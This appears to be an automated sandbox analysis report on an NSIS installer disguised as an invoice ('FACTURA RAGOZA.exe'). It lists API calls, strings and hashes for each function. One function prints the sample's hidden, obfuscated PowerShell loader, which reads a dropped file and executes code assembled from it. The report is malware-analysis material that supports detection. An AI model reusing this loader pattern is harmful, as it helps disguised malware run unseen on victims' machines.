Function 00406033 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNELBASE(74DF3410,0042B0B8,0042AC70,004058D2,0042AC70,0042AC70,00000000,0042AC70,0042AC70,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,74DF3410,C:\Users\user\AppData\Local\Temp\), ref: 0040603E
FindClose.KERNEL32(00000000), ref: 0040604A

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 1a0439c71b90d7762d613f3ef5096b6a49eabdc5bf1978f8ceae5763bb33e6b2
Instruction ID: 8bfbb141000912a81af5c8de5ce039a851029b32224eb031c3a4159cf0b452c4
Opcode Fuzzy Hash: 1a0439c71b90d7762d613f3ef5096b6a49eabdc5bf1978f8ceae5763bb33e6b2
Instruction Fuzzy Hash: 11D0123195D1205BC31167387D0C88B7B599B163317518A33B56AF12F0C7349C6686EE

Function 00403A41 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A7D
ShowWindow.USER32(?), ref: 00403A9A
DestroyWindow.USER32 ref: 00403AAE
SetWindowLongA.USER32(?,00000000,00000000), ref: 00403ACA
GetDlgItem.USER32(?,?), ref: 00403AEB
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403AFF
IsWindowEnabled.USER32(00000000), ref: 00403B06
GetDlgItem.USER32(?,00000001), ref: 00403BB4
GetDlgItem.USER32(?,00000002), ref: 00403BBE
SetClassLongA.USER32(?,000000F2,?), ref: 00403BD8
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403C29
GetDlgItem.USER32(?,00000003), ref: 00403CCF
ShowWindow.USER32(00000000,?), ref: 00403CF0
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403D02
EnableWindow.USER32(?,?), ref: 00403D1D
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403D33
EnableMenuItem.USER32(00000000), ref: 00403D3A
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403D52
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403D65
lstrlenA.KERNEL32(00429868,?,00429868,Formynderisk Setup), ref: 00403D8E
SetWindowTextA.USER32(?,00429868), ref: 00403D9D
ShowWindow.USER32(?,0000000A), ref: 00403ED1

Strings

Formynderisk Setup, xrefs: 00403D7F

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: Formynderisk Setup
API String ID: 3282139019-3066058281
Opcode ID: fc27e82e98cabd3308fd2f89a2a423f79f43cd40c567b8a18826c7a47723085f
Instruction ID: 4996b7fab7fdeaebc033b1676f4cae353b3174fabf4a12f0715eb1af02f584c4
Opcode Fuzzy Hash: fc27e82e98cabd3308fd2f89a2a423f79f43cd40c567b8a18826c7a47723085f
Instruction Fuzzy Hash: 74C1B131A04205ABDB216F62ED85E2B7EBCFB4570AF40053EF501B11E1C739A942DB6E

Function 004036AF Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004060C8: GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
Part of subcall function 004060C8: GetProcAddress.KERNEL32(00000000,?), ref: 004060F5

lstrcatA.KERNEL32(1033,00429868,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429868,00000000,00000002,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FACTURA RAGOZA.exe",00000000), ref: 0040372A
lstrlenA.KERNEL32(Space required: ,?,?,?,Space required: ,00000000,C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian,1033,00429868,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429868,00000000,00000002,74DF3410), ref: 0040379F
lstrcmpiA.KERNEL32(?,.exe), ref: 004037B2
GetFileAttributesA.KERNEL32(Space required: ), ref: 004037BD
LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian), ref: 00403806

Part of subcall function 00405C8D: wsprintfA.USER32 ref: 00405C9A

RegisterClassA.USER32(0042DBA0), ref: 00403843
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040385B
CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403890
ShowWindow.USER32(00000005,00000000), ref: 004038C6
GetClassInfoA.USER32(00000000,RichEdit20A,0042DBA0), ref: 004038F2
GetClassInfoA.USER32(00000000,RichEdit,0042DBA0), ref: 004038FF
RegisterClassA.USER32(0042DBA0), ref: 00403908
DialogBoxParamA.USER32(?,00000000,00403A41,00000000), ref: 00403927

Strings

1033, xrefs: 004036CF, 00403725
Space required: , xrefs: 0040376D, 00403775, 00403782, 004037CC, 004037D2
"C:\Users\user\Desktop\FACTURA RAGOZA.exe", xrefs: 004036B3
.exe, xrefs: 004037AC
RichEd32, xrefs: 004038DA
C:\Users\user\AppData\Local\Temp\, xrefs: 004036B4
RichEdit, xrefs: 004038F9
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian, xrefs: 00403739, 00403741, 004037D9, 004037DF, 004037EF
.DEFAULT\Control Panel\International, xrefs: 00403715
RichEdit20A, xrefs: 004038EA, 004038F0
_Nb, xrefs: 00403822, 0040388A
Control Panel\Desktop\ResourceLocale, xrefs: 004036E3
RichEd20, xrefs: 004038CC

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\FACTURA RAGOZA.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$Space required: $_Nb
API String ID: 1975747703-2365987660
Opcode ID: 394e4bb129311e5b6d6d20aedec098417f6b3d3145e2df1ac527dc8f8ff082cb
Instruction ID: 60e5f6254d87716c4f77e59e0de616dae33e132719ef70849b8472436850552a
Opcode Fuzzy Hash: 394e4bb129311e5b6d6d20aedec098417f6b3d3145e2df1ac527dc8f8ff082cb
Instruction Fuzzy Hash: 4161E6B07442006EE620BF269C85F373EACEB45749F50443FF945B62E2C67CAD429A2D

Function 00402C66 Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402C77
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\FACTURA RAGOZA.exe,00000400), ref: 00402C93

Part of subcall function 004059A2: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\FACTURA RAGOZA.exe,80000000,00000003), ref: 004059A6
Part of subcall function 004059A2: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8

GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\FACTURA RAGOZA.exe,C:\Users\user\Desktop\FACTURA RAGOZA.exe,80000000,00000003), ref: 00402CDF

Strings

soft, xrefs: 00402D54
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E3E
"C:\Users\user\Desktop\FACTURA RAGOZA.exe", xrefs: 00402C66
!, xrefs: 00402D6C, 00402DC9
Inst, xrefs: 00402D4B
!, xrefs: 00402CE7
C:\Users\user\Desktop\FACTURA RAGOZA.exe, xrefs: 00402C7D, 00402C8C, 00402CA0, 00402CC0
C:\Users\user\AppData\Local\Temp\, xrefs: 00402C6D
Error launching installer, xrefs: 00402CB6
Null, xrefs: 00402D5D
C:\Users\user\Desktop, xrefs: 00402CC1, 00402CC6, 00402CCC

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\FACTURA RAGOZA.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\FACTURA RAGOZA.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft$!$!
API String ID: 4283519449-2983459881
Opcode ID: 5f7c5d9e77a9b9c73338c6d1e92cd20f3f30bb0dbb8c708eeee72798782a561c
Instruction ID: 2dd8a40a4a6da4a25a7ff80ffc2ca296f3ca1cc65932c4217ff60142993c7b59
Opcode Fuzzy Hash: 5f7c5d9e77a9b9c73338c6d1e92cd20f3f30bb0dbb8c708eeee72798782a561c
Instruction Fuzzy Hash: 9651F771940214ABDF20AF65DE89B9E7AA8EF04714F54803BF504B72D2C7BC9D418BAD

Function 00401751 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatA.KERNEL32(00000000,00000000,"powershell.exe" -windowstyle hidden "$Bronzestbere203=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Eeriness.Jen';$Paaskedags=$Bronzestbere203.SubString(53880,3);.$Paaskedags($Bronzestbere203)",C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Subjektiverer,00000000,00000000,00000031), ref: 00401790
CompareFileTime.KERNEL32(-00000014,?,"powershell.exe" -windowstyle hidden "$Bronzestbere203=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Eeriness.Jen';$Paaskedags=$Bronzestbere203.SubString(53880,3);.$Paaskedags($Bronzestbere203)","powershell.exe" -windowstyle hidden "$Bronzestbere203=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Eeriness.Jen';$Paaskedags=$Bronzestbere203.SubString(53880,3);.$Paaskedags($Bronzestbere203)",00000000,00000000,"powershell.exe" -windowstyle hidden "$Bronzestbere203=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Eeriness.Jen';$Paaskedags=$Bronzestbere203.SubString(53880,3);.$Paaskedags($Bronzestbere203)",C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Subjektiverer,00000000,00000000,00000031), ref: 004017BA

Part of subcall function 00405D2F: lstrcpynA.KERNEL32(?,?,00000400,004031BD,Formynderisk Setup,NSIS Error), ref: 00405D3C

Part of subcall function 00404F48: lstrlenA.KERNEL32(00429048,00000000,0041C205,74DF23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,00429048,00000000,0041C205,74DF23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
Part of subcall function 00404F48: lstrcatA.KERNEL32(00429048,00402FFA,00402FFA,00429048,00000000,0041C205,74DF23A0), ref: 00404FA4
Part of subcall function 00404F48: SetWindowTextA.USER32(00429048,00429048), ref: 00404FB6
Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004

Strings

Arabisation\argumenta\dekaderne, xrefs: 0040179B, 0040180A, 00401828
C:\Users\user\AppData\Local\Temp\Vedlgges.Fam, xrefs: 0040181E, 0040183A
"powershell.exe" -windowstyle hidden "$Bronzestbere203=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Eeriness.Jen';$Paaskedags=$Bronzestbere203.SubString(53880,3);.$Paaskedags($Bronzestbere203)", xrefs: 0040176D, 00401776, 00401783, 00401795, 004017A6, 004017DC, 004017F2, 00401810, 00401850, 004018D1, 004018DA, 004018E4, 004018EF
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Subjektiverer, xrefs: 0040177E

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: "powershell.exe" -windowstyle hidden "$Bronzestbere203=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Eeriness.Jen';$Paaskedags=$Bronzestbere203.SubString(53880,3);.$Paaskedags($Bronzestbere203)"$Arabisation\argumenta\dekaderne$C:\Users\user\AppData\Local\Temp\Vedlgges.Fam$C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Subjektiverer
API String ID: 1941528284-3377599288
Opcode ID: 4f9644c0113f451ee2cb14cf97c87bd5b67e16b7d88c3abb121216c9f25fe8f5
Instruction ID: 9fffb686f64fba45267de9fcbed8a5438fb589d34f2a074259106400a528bed4
Opcode Fuzzy Hash: 4f9644c0113f451ee2cb14cf97c87bd5b67e16b7d88c3abb121216c9f25fe8f5
Instruction Fuzzy Hash: 1041B831900519BBDF107BA5DC85EAF3679DF45368B60863BF121F11E1D63C8A418A6D

Function 00402E9F Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402F06
GetTickCount.KERNEL32 ref: 00402FAD
MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402FD6
wsprintfA.USER32 ref: 00402FE6

Strings

DwA, xrefs: 00402F73, 00402F85
DA, xrefs: 00402F5C
DA, xrefs: 00403060
... %d%%, xrefs: 00402FE0

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: DA$ DA$... %d%%$DwA
API String ID: 551687249-506594815
Opcode ID: 3c1c6048edc1f00d8c5e0ea3695652e11966b85d101879319fc20926b17e4e8a
Instruction ID: 91ee06cea14faca46f7a5a314d1b96781db6e884ff6161e1c143c8ea96f9570f
Opcode Fuzzy Hash: 3c1c6048edc1f00d8c5e0ea3695652e11966b85d101879319fc20926b17e4e8a
Instruction Fuzzy Hash: FB51907190120A9BDB10DF65EA44B9F7BB8EF44756F10813BE800B72C4D7788E51DBAA

Function 0040540E Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405451
GetLastError.KERNEL32 ref: 00405465
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 0040547A
GetLastError.KERNEL32 ref: 00405484

Strings

ts@, xrefs: 00405414
ds@, xrefs: 00405443
C:\Users\user\AppData\Local\Temp\, xrefs: 00405434
C:\Users\user\Desktop, xrefs: 0040540E

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
API String ID: 3449924974-3946084282
Opcode ID: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
Instruction ID: 7d6f839e8d8492d35463ff02b487d6c5a8d89e3dbffb35ab490880a12e6152a5
Opcode Fuzzy Hash: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
Instruction Fuzzy Hash: B4010871D14259EADF11DBA0C9447EFBFB8EB14355F004176E905B6280E378A644CFAA

Function 0040605A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406071
wsprintfA.USER32 ref: 004060AA
LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004060BE

Strings

\, xrefs: 00406082
UXTHEME, xrefs: 00406063
%s%s.dll, xrefs: 004060A4

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
Instruction ID: e3f146f71c0a6e9640e358317deb724d3a5625ccb5f8d81b259ee964bec3998a
Opcode Fuzzy Hash: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
Instruction Fuzzy Hash: D0F0FC3095010566DB14DB74DD0DFEB375CAB08305F14017AA647E11D1D974F9248B69

Function 00402364 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023A2
lstrlenA.KERNEL32(Arabisation\argumenta\dekaderne,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C2
RegSetValueExA.ADVAPI32(?,?,?,?,Arabisation\argumenta\dekaderne,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023FB
RegCloseKey.ADVAPI32(?,?,?,Arabisation\argumenta\dekaderne,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8

Strings

Arabisation\argumenta\dekaderne, xrefs: 004023B3, 004023D5, 004023E5, 004023F0

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: Arabisation\argumenta\dekaderne
API String ID: 1356686001-2217045471
Opcode ID: af2b45bfcb0136edb290ca19ee121481d5b6a55bc37b0262ae4d3dbc08afb77b
Instruction ID: f509f4240a3e10e7eaa3df5a693eb391f4e90e3bb863c7dbc5285fb3648b227d
Opcode Fuzzy Hash: af2b45bfcb0136edb290ca19ee121481d5b6a55bc37b0262ae4d3dbc08afb77b
Instruction Fuzzy Hash: 6B117571E00108BFEB10EBA5DE89EAF767DEB54358F10403AF605B71D1D6B85D419B28

Function 004059D1 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004059E5
GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 004059FF

Strings

"C:\Users\user\Desktop\FACTURA RAGOZA.exe", xrefs: 004059D1
nsa, xrefs: 004059DC
C:\Users\user\AppData\Local\Temp\, xrefs: 004059D4

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

